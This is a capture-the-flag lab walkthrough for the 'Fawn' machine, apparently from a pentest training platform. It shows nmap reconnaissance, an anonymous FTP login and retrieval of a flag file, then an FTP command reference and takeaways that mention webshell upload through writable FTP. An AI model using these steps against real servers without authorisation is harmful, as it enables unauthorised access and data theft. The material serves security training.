Fawn introduces FTP anonymous access — one of the most frequently encountered misconfigurations in internal network pentests. File Transfer Protocol (FTP) was designed in the early days of the internet with no security in mind. When anonymous login is enabled, anyone can connect and browse files without a password.
Tools: nmap · ftp · Difficulty: Very Easy · OS: Linux
01 — What You Will Learn
| Skill | Why it matters |
|---|---|
| FTP enumeration with Nmap scripts | Nmap's ftp-anon script auto-detects anonymous access during scanning |
| Anonymous FTP login | A staple finding in internal assessments — file servers, legacy NAS devices |
| FTP client navigation | Listing, downloading, and inspecting files via the FTP CLI |
| Sensitive data exposure | Anonymous FTP often exposes config files, backups, and credentials |
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
What you're seeing: Nmap's default scripts (-sC) include ftp-anon which automatically tests for anonymous login and lists the directory. You can already see flag.txt before even connecting.
ℹ vsftpd (Very Secure FTP Daemon) is one of the most common FTP servers on Linux. Version 3.0.3 has no critical CVEs in this context — the vulnerability here is purely configuration, not the software itself.
03 — Exploitation
Connect using the FTP client. Use anonymous as the username and either a blank password or any email-format string.
FTP anonymous login
ftp 10.129.x.x
Connected to 10.129.x.x.
Name (10.129.x.x:kali): anonymous
Password: (press Enter or type any email)
230 Login successful.
ftp>
List and retrieve the file
ftp> ls
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
ftp> get flag.txt
226 Transfer complete.
ftp> bye
Read the flag locally
cat flag.txt
✓ Submit the flag string to complete the machine.
04 — FTP Command Reference
| Command | What it does |
|---|---|
| ls / dir | List files in the current remote directory |
| cd <dir> | Change remote directory |
| get <file> | Download a single file to the local directory |
| mget * | Download all files in the current directory |
| put <file> | Upload a file (if write permission is granted) |
| binary | Switch to binary mode — required for non-text files |
| passive | Toggle passive mode — needed when behind a NAT/firewall |
| bye / quit | Close the connection |
05 — Key Takeaways
| Concept | Real-world relevance |
|---|---|
| Anonymous FTP enabled | Commonly found on internal file servers, printers, and legacy NAS — always test port 21 with anonymous login |
| FTP is plaintext | Like Telnet, FTP sends credentials and data unencrypted — use SFTP or FTPS in production |
| Nmap scripts save time | Default scripts (-sC) catch anonymous FTP, HTTP titles, SMB shares and more automatically |
| Write access = code execution | If anonymous FTP allows uploads to a web-accessible directory, it becomes a webshell upload vector |
Anonymous FTP is a quick win that shows up surprisingly often in real internal audits — network printers, embedded devices, and old file servers are common offenders.